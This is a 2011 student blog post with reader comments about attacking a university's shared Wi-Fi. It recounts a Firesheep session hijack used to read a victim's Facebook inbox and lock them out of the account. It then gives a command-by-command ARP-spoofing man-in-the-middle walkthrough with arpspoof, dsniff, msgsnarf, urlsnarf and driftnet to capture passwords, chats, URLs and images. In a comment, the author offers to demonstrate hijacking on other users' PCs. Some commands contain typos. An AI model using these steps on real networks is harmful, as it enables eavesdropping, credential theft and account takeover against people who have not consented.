RSS

Hacking WI-FI ya JKUAT.

28 Sep

I get scared at times….not of cliche things like of the dark or of being shot by the cops because I come from one of those neighborhoods.What scares me most is cyber attack….This is going to be a tech post so if you  not into that kind of thing please click here>>>>

That being said let me  dive head fist into the contents.I am a wi-fi junkie… I spend more time online than I do with my girlfriend,Wi-fi has been good to me(when its not that time of the month when it gets all hormonal)…So why am I afraid???

Well lets just take it from the top…I share an access point with some 100 or so guys at peak and 4-5 at off peak,the commonest site visited is Facebook, YouTube and probably Yahoo(I didn’t mention Google coz it goes without say).Peak time is usually from 7-10Pm and off peak ranges from there..The wi-fi network is protected with a  WPA2  security pass and AES encryption format(not TKIP)..The network is behind a proxy server that runs SQUID..and what do we all know about squid??? Squid sacks at HTTPS (ad rather go for an ISA server but then again am not JKUAT,i only go to school there)

Sasa Jaymo ju umetuambia hii yote,how does an attack occur?.kwanza this is purely for educational  purposes.one of  the easiest attacks is using a lilttle known tool called firesheep.Ok firesheep is fa***** easy to use,.Primarily coz its not a stand alone software rather a firefox addon…With this nifty addon you can do a tonne of things to rookie web users…wanna hear like what?

Supposing student x logs on to an acess point say RUNDA wireless connection.The DHCP awards him a renewable 1 hour lease on an IP(all without him knowing) and he establishes an Internet connection.He is just from chatting with this fresha chic who gave him her Facebook handle,so student X wants to snoop…He launches his Mozilla and types the URL,seconds later the login page appears,he logs in and continues doing his thing…pretty standard right???? Well across the yard Hacker X launches his Firesheep and begins this hack..he notices Student X is logged onto Facebook via HTTP instead of HTTPS..and decides to steal his session…does kidogo of this and that….minutes  later he has the exact facebook session as student X..while he is at it he even decides to go through this nygas Inboxes to see if he is still dating that gorgeous chic of his…If thats not scary enough,he goes to Facebook settings,changes the backend Email adress and Facebook password..logs out and kicks Student X out of his own fa**** facebook page….awsome.

How is this being done…session Hijacking…What all WI-FI networks have in common is that people will acess them to browse(daaaaaa) and when they do some one can easily steal unencrypted cookie sessions.session hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server(SQUID in my case)

Hiyo ni moja..next bucket-brigade attack…aka man-in-the-middle-attack.This is what good old wikipedia has to say about bucket bridge attack. This is an attack where the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted      Wi-Fi wireless access point, can insert himself as a man-in-the-middle).

And since am in a good mood today am going to give you a proff of concept that I actually tried out….First Am usually working on a linux distro called Bactrack….(sorry windows slaves,windows cant hack..f*** what you see in the movies).

So open up a shell and get the tools you want primarily we are going to be doing  arpspoof poisoning and so we need to get driftnet and dsniff.

So on bash run:-sudo apt-get install driftnet dsniff. next we enable packetforwading…echo 1>  /proc/sys/net/ipv4/ip_foward   then cat /proc/sys/net/ipv4/ip_foward  this is to allow the traffic on the network to flow via your machine…then we begin the arpspoff poisoning

sudo arpspoof -t <your ip> <router ip>  split your screen and do the reverse sudo arpspoof -t <router ip> <your ip> . And that’s it,you are primarily the man in the middle here.Now you can have fun  with this attack…

an easy one is:

 msgsnarf -i etho, where etho is the name of the network interface..you can listen to all the instant message services running,am talking MSN,gtalk…any instant messanger.so you can watch someone chatting.

urlsnarf -i -etho, Listens to port 8080,80,3128,if you in JKUAT and you use wi-fi then you must know what port 3128 is.This one obviously listens to URL that are being sent.

If you are intersted in password then we can go back to dsniff and do that

sudo dsniff -i eth0, this will listen to any password being sent.

Now if you want to see what Student X is viewing online,kama picha hivi then we switch back to driftnet

sudo drifnet -i -eth0,  this will give you a visualization of activity on the network

Bassss thats why i get afraid…but no biggie…In my next post i will tell you how to protect yourself from and of the above attacks….wacha nikasomee CAT ya fluidmechanics

 
7 Comments

Posted by on September 28, 2011 in hack, INTERNSHIP, JKUAT, true stories

 

Tags: , , ,

7 responses to “Hacking WI-FI ya JKUAT.

  1. Nash

    September 28, 2011 at 2:44 pm

    u can do that facebook thing u claim

     
    • akajaymo

      September 28, 2011 at 3:22 pm

      You want a demo???Ukikuja,hiyo Monday we can do session hijacking on any pc kwa hiyo grid..as you watch

       
  2. jichonyanya

    September 28, 2011 at 4:33 pm

    i was abt to start hacking when i saw ati windows cant hack!!damn

     
    • akajaymo

      September 28, 2011 at 4:39 pm

      Windows limits sockets to around 130..and thats kidogo if you know what i mean

       
  3. korea korea

    July 2, 2013 at 4:27 am

    Spot on with this write-up, I honestly believe this web site needs far more attention.
    I’ll probably be returning to read through more, thanks for the info!

     
    • akajaymo

      July 2, 2013 at 5:22 am

      Feel free to visit it any time

       
  4. seo reputation management

    July 3, 2013 at 4:20 am

    We are a bunch of volunteers and opening a brand new scheme in our community.
    Your web site offered us with valuable information
    to work on. You’ve performed a formidable activity and our whole neighborhood can be thankful to you.

     

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: